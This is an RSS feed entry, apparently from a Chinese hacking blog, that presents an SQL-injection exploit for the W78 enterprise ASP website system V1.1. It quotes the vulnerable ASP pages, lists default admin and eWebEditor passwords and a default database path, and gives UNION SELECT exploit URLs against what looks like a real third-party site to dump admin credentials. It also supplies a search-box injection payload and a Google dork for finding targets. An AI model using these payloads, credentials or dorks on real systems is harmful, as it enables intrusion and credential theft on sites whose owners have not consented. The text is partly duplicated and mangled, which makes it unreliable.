裸奔的系统。
1.shopmore.asp
set rs=server.createobject(&#8220;adodb.recordset&#8221;)
exec=&#8221;select * from [shop] where ssfl=&#8221;&#38; request.QueryString(&#8220;id&#8221;) &#38;&#8221; order by id desc &#8221;
rs.open exec,conn,1,1
if rs.eof then
response.Write &#8221; 该分类暂无产品！&#8221;
else
rs.PageSize =20 &#8216;每页记录条数
iCount=rs.RecordCount &#8216;记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request(&#8220;page&#8221;)
if Not IsNumeric(page) or page=&#8221;" then
page=1
2.about.asp
exec=&#8221;select * from [about] where id=&#8221;&#38; request.QueryString(&#8220;id&#8221;)
set rs=server.createobject(&#8220;adodb.recordset&#8221;)
rs.open exec,conn,1,1
3.search_news.asp
dim title
title=request.form(&#8220;form_news&#8221;)
set rs=conn.execute(&#8220;select * from [news] where title like &#8216;%&#8221;&#38;title&#38;&#8221;%&#8217;&#8221;)
if title=&#8221;" then
response.write (&#8220;&#60;script language=&#8221;"javascript&#8221;"&#62;alert(&#8220;&#8221;请输入关键字！&#8221;");history.go(-1);&#60;/script&#62;&#8221;)
end if
if rs.eof then
response.write (&#8220;&#60;script language=&#8221;"javascript&#8221;"&#62;alert(&#8220;&#8221;没有搜索到相关内容！&#8221;");history.go(-1);&#60;/script&#62;&#8221;)
还有其他的页面。
4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试
后台默认密码为admin11 86779533 [...]]]></description>
			<content:encoded><![CDATA[<p>W78企业ASP网站管理系统V1.1的SQL注入</p>
<p>裸奔的系统。<br />
1.shopmore.asp</p>
<p>set rs=server.createobject(&#8220;adodb.recordset&#8221;)<br />
exec=&#8221;select * from [shop] where ssfl=&#8221;&amp; request.QueryString(&#8220;id&#8221;) &amp;&#8221; order by id desc &#8221;<br />
rs.open exec,conn,1,1<br />
if rs.eof then<br />
response.Write &#8221; 该分类暂无产品！&#8221;<br />
else<br />
rs.PageSize =20 &#8216;每页记录条数<br />
iCount=rs.RecordCount &#8216;记录总数<br />
iPageSize=rs.PageSize<br />
maxpage=rs.PageCount<br />
page=request(&#8220;page&#8221;)<br />
if Not IsNumeric(page) or page=&#8221;" then<br />
page=1<br />
2.about.asp</p>
<p>exec=&#8221;select * from [about] where id=&#8221;&amp; request.QueryString(&#8220;id&#8221;)<br />
set rs=server.createobject(&#8220;adodb.recordset&#8221;)<br />
rs.open exec,conn,1,1</p>
<p>3.search_news.asp</p>
<p>dim title<br />
title=request.form(&#8220;form_news&#8221;)<br />
set rs=conn.execute(&#8220;select * from [news] where title like &#8216;%&#8221;&amp;title&amp;&#8221;%&#8217;&#8221;)<br />
if title=&#8221;" then<br />
response.write (&#8220;&lt;script language=&#8221;"javascript&#8221;"&gt;alert(&#8220;&#8221;请输入关键字！&#8221;");history.go(-1);&lt;/script&gt;&#8221;)<br />
end if<br />
if rs.eof then<br />
response.write (&#8220;&lt;script language=&#8221;"javascript&#8221;"&gt;alert(&#8220;&#8221;没有搜索到相关内容！&#8221;");history.go(-1);&lt;/script&gt;&#8221;)</p>
<p>还有其他的页面。</p>
<p>4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp<br />
默认user:admin password:198625<br />
不能进的还可以试试</p>
<p>后台默认密码为admin11 86779533 abc123这三个</p>
<p>试试数据库默认地址为/data/%23sze7xiaohu.mdb</p>
<p>exp：<a href="http://www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201" target="_blank">http://www.xx.com/about.a &#8230; 0union%20select%201</a>,admin,3,password,5,6%20from%20admin</p>
<p><a href="http://www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201" target="_blank">http://www.xx.com/ShopMor &#8230; 0union%20select%201</a>,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin</p>
<p>搜索型注入：%&#8217; and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where &#8216;%&#8217;=&#8217;</p>
<p>Google:inurl:ShopMore.asp?id</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=17</wfw:commentRss>
		<slash:comments>17094</slash:comments>
		</item>
	</channel>
</rss>
